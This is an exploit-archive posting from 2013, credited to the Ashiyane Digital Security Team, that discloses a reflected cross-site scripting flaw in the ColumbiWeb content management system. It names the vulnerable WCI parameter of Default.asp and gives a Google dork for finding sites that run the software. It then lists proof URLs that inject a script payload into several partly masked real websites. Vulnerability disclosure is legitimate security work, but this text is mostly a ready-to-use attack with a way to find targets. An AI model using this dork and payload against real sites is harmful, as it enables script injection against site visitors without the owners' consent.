Home / exploits ColumbiWeb Cross site scripting Vulnerabilites
Posted on 07 September 2013
#******************************************************************************** # Exploit Title : ColumbiWeb Cross site scripting Vulnerabilites # # Software link : http://www.daldata.no # # Exploit Author : Ashiyane Digital Security Team # # Tested on: Windows 7 , Linux # # Google Dork : intext:"Powered by ColumbiWeb" # # Date: 2013/09/06 # -------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]/Default.asp?WCE=&WCI=[xss] # # # Proof: # # http://www.hXno/Default.asp?WCE=&WCI=<script>alert(1);</script> # # http://www.hXXno/Default.asp?WCE=&WCI=<script>alert(1);</script> # # http://www.femXXXdal.no/Default.asp?WCE=&WCI=<script>alert(1);</script> # # http://www.femXXXgerdal.no/Default.asp?WCE=&WCI=<script>alert(1);</script> # # http://www.enXXdal.info/Default.asp?WCE=&WCI=<script>alert(1);</script> # # ###################### discovered by : ACC3SS ######################
